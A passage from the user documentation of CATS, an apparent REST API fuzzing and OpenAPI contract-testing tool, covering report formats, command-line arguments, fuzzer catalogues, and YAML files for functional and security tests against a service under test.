  • have ability to click on any tests and get details about the Scenario being executed, Expected Result, Actual result as well as request/response details

Along with the summary from index.html each individual test will have a specific TestXXX.html page with more details, as well as a json version of the test which can be latter replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

  • Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
  • Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
  • Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
  • Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
  • Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
  • Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:


And this is what you get when you click on a specific test: 



HTML_ONLY

This format is similar with HTML_JS, but you cannot do any filtering or sorting.

JUNIT

CATS also supports JUNIT output. The output will be a single testsuite that will incorporate all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of warning the following mapping is used:

  • CATS error is reported as JUNIT error
  • JUNIT failure is not used at all
  • CATS warn is reported as JUNIT skipped
  • CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers. Currently, 89 and growing. Some of the Fuzzers are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific Fuzzers like: --checkHttp, -checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or -skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitesspaces. This will skip all Fuzzers containing these strings in their name. After, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that due to the fact that ControlChars, Emojis and Whitespaces generate huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and report those cases as success instead or WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResultCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code, based on the scenario under test and will report and WARN the service returns the expected response code, but the response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking expected response code inside the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report an WARN if not matching. You can make CATS ignore the response body checks using the --ingoreResponseBodyCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

  • test names can be separated by comma ,
  • if you provide a json extension to a test name, that file will be search as a path i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
  • if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

  • > cats help or cats -h will list all available options

  • > cats list --fuzzers will list all the existing fuzzers, grouped on categories

  • > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

  • > cats list --paths --contract=CONTRACT will list all the paths available within the contract

  • > cats replay "test1,test2" will replay the given tests test1 and test2

  • > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

  • > cats run will run functional and targeted security tests written in the CATS YAML format

  • > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

  • --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
  • --server=URL supplies the URL of the service implementing the contract.
  • --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
  • --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS which check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
  • --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
  • --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
  • --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
  • --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
  • --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
  • --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
  • --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
  • --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
  • --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
  • --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
  • --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
  • --skipFuzzers=LIST_OF_FIZZERs a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skippedFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contains the string you provide in the arguments value.
  • --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
  • --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
  • --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
  • --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
  • --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
  • --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
  • --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false CATS will rely only on generated values
  • --checkFields If supplied (no value needed), it will only run the Field Fuzzers
  • --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
  • --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
  • --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
  • --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
  • --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
  • --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key from the sslKeystore
  • --proxyHost The proxy server's host name (if running behind proxy)
  • --proxyPort The proxy server's port number (if running behind proxy)
  • --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
  • --connectionTimeout Time period in seconds which CATS should establish a connection with the server; default is 10 seconds
  • --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
  • --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
  • --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
  • --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
  • --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
  • --ignoreResponseCodeUndocumentedCheck If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
  • --ignoreResponseBodyCheck If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
  • --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
  • --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
  • --outoput The path where the CATS report will be written. Default is cats-report in the current directory
  • --skipReportingForIgnoredCodes Skip reporting entirely for the any ignored arguments provided in --ignoreResponseXXX
> cats --contract=my.yml --server=https://locathost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as an API spec and will only run the HTTP headers Fuzzers.

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

  • Field Fuzzers which target request body fields or path parameters
  • Header Fuzzers which target HTTP headers
  • HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

  • ContractInfo Fuzzers which checks the contract for API good practices
  • Special Fuzzers a special category which need further configuration and are focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS has currently 42 registered Field Fuzzers:

  • BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
  • DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
  • DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
  • DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
  • EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
  • ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
  • ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
  • ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
  • ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
  • IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
  • IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
  • InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
  • LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
  • LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
  • LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
  • LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
  • MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have maxLength declared and send requests with values matching the maxLength size/value in the targeted field
  • MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have maximum declared and send requests with values matching the maximum size/value in the targeted field
  • MinLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have minLength declared and send requests with values matching the minLength size/value in the targeted field
  • MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have minimum declared and send requests with values matching the minimum size/value in the targeted field
  • NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
  • NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
  • OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
  • OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
  • OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
  • OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
  • RemoveFieldsFuzzer - iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
  • StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
  • StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
  • StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted field
  • StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
  • StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
  • TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode whitespaces and invisible separators in the targeted field
  • TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode control chars in the targeted field
  • TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
  • TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
  • VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
  • WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
  • WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
  • WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
  • ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.

Header Fuzzers

CATS has currently 28 registered Header Fuzzers:

  • AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
  • CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
  • DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
  • DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
  • DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
  • EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
  • ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
  • LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
  • LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
  • LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
  • LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
  • RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
  • OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
  • OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
  • OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
  • TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header \
  • TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
  • TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
  • UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
  • UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
  • ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS has currently 6 registered HTTP Fuzzers:

  • BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
  • DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
  • HappyFuzzer - send a request with all fields and headers populated
  • HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
  • MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
  • NonRestHttpMethodsFuzzer - iterate through a list of HTTP method specific to the WebDav protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to make it easy digestible by the service clients and act as much as possible as self-sufficient documentation:

  • follow good practices around naming the contract elements like paths, requests, responses
  • always use plural for the path names, separate paths words through hyphens/underscores, use camelCase or snake_case for any json types and properties
  • provide tags for all operations in order to avoid breaking code generation on some languages and have a logical grouping of the API operations
  • provide good description for all paths, methods and request/response elements
  • provide meaningful responses for POST, PATCH and PUT requests
  • provide examples for all requests/response elements
  • provide structural constraints for (ideally) all request/response properties (min, max, regex)
  • heaver some sort of CorrelationIds/TraceIds within headers
  • have at least a security schema in place
  • avoid having the API version part of the paths
  • document response codes for both "happy" and "unhappy" flows
  • avoid using xml payload unless there is a really good reason (like documenting an old API for example)
  • json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS has currently 9 registered ContractInfo Fuzzers:

  • HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
  • NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
  • PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
  • RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
  • RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
  • SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
  • TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
  • VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
  • XmlContentTypeContractInfoFuzzer - verifies that all OpenAPI contract paths responses and requests does not offer application/xml as a Content-Type

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so called FunctionaFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payload, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: value
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

  • you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
  • you can have multiple tests under the same path: test1, test2, etc.
  • expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
  • at most one of the properties can have multiple values. When this situation happens, that test will actually become a list of tests one for each of the values supplied. For example in the above example prop7 has 3 values. This will actually result in 3 tests, one for each value.
  • test within the file are executed in the declared order. This is why you can have outputs from one test act as inputs for the next one(s) (see the next section for details).
  • if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
  • if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
  • if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
  • if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, than a custom test will be created for each type of payload
  • the file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of .

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATs mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name, and its fully qualified name from the response in order to set its value. You can then refer the variable using ${variable_name} from another test in order to use its value.

Here is an example:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200

Suppose the test_1 execution outputs:

{
"pet":
{
"id" : 2
}
}

When executing test_1 the value of the pet id will be stored in the petId variable (value 2). When executing test_2 the id parameter will be replaced with the petId variable (value 2) from the previous case.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "Baby"
pet#id: "[0-9]+"
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200

Considering the above file:

  • the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
  • if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
"pet":
{
"id" : 2,
"name": "Baby"
}
}

But this one won't (pet#name is missing):

{
"pet":
{
"id" : 2
}
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "${request#name}"
pet#id: "[0-9]+"

It will verify if the response contains a pet#name element and that its value equals My Pet as sent in the request.

Some notes:

  • verify parameters support Java regexes as values
  • you can supply more than one parameter to check (as seen above)
  • if at least one of the parameters is not present in the response, CATs will report an error
  • if all parameters are found and have valid values, but the response code is not matched, CATs will report a warning
  • if all the parameters are found and match their values, and the response code is as expected, CATs will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATs is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verify responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes and a stringsList element. A typical securityFuzzerFile will look like this:

/pet:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example instead of ..

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

  • it will add the fixed value "My Pet" to all the request for the field name
  • for each field specified in the targetFields i.e. pet#id and pet#description it will create requests for each line from the xss.txt file and supply those values in each field
  • if you consider the xss.txt sample file included in the CATs repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description i.e. a total of 42 tests
  • for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATs will report the test as error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt

Instead of specifying the field names, you can broader to scope to target certain fields types. For example, if we want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFieldTypes:
- string
stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, a xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice (for now) to not include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, so might be perfectly valid to expect a 200 or might validate the fields directly, so might be perfectly valid to expect a 400. A 500 will usually mean something was not handled properly and might signal a possible bug.

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl:

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

  • send a POST request to http://service-url
  • use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
  • replace one by one field1,field2,header with fuzz data and send each request to the service endpoint
  • ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

  • null values
  • empty values
  • zalgo text
  • abugidas characters
  • large random unicode data
  • very large strings (80k characters)
  • single and multi code point emojis
  • unicode control characters
  • unicode separators
  • unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2

Reference Data File

